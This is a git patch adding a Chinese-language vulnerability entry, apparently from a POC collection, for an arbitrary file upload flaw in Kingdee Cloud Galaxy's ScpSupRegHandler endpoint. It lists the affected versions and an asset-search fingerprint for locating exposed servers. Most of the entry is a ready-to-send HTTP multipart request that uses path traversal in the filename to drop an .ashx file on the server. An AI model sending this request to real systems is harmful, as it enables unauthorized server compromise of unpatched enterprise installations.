From 6fca63c0be8eac869ade840ccc2fa4bf690497f2 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 17 Nov 2023 12:41:42 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=87=91=E8=9D=B6OA=E4=BA=91=E6=98=9F?= =?UTF-8?q?=E7=A9=BA=20ScpSupRegHandler=20=E4=BB=BB=E6=84=8F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...A云星空 ScpSupRegHandler 任意文件上传漏洞.md | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞.md diff --git a/金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞.md b/金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞.md new file mode 100644 index 0000000..3193a2c --- /dev/null +++ b/金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞.md @@ -0,0 +1,46 @@ +## 金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞 + +### 漏洞描述: +金蝶OA云星空 ScpSupRegHandler接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取服务器权限 + +### 漏洞影响: + +金蝶云星空企业版私有云、企业版私有云(订阅)、标准版私有云(订阅)三个产品V6.2(含17年12月补丁) 至 V8.1(含23年9月补丁) + +### 网络测绘: +``` +app="金蝶云星空-管理中心" +``` + +### 漏洞复现: +登陆页面 +POC: +``` +POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1 +Host: +Accept-Encoding: identity +Content-Length: 973 +Accept-Language: zh-CN,zh;q=0.8 +Accept: */*Cache-Control: max-age=0 +Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061 + +--2ac719f8e29343df94aa4ab49e456061 +Content-Disposition: form-data; name="dbId_v" + +. +--2ac719f8e29343df94aa4ab49e456061 + +Content-Disposition: form-data; name="FID" + +2022 +--2ac719f8e29343df94aa4ab49e456061 +Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx." +Content-Type: text/plain + +11 +--2ac719f8e29343df94aa4ab49e456061- +``` + +![image](https://github.com/wy876/POC/assets/139549762/0175cf8c-a854-4b15-800c-7a07e3d0306c) + +![image](https://github.com/wy876/POC/assets/139549762/7e731399-8257-448b-9ab4-2260d9c4dc43)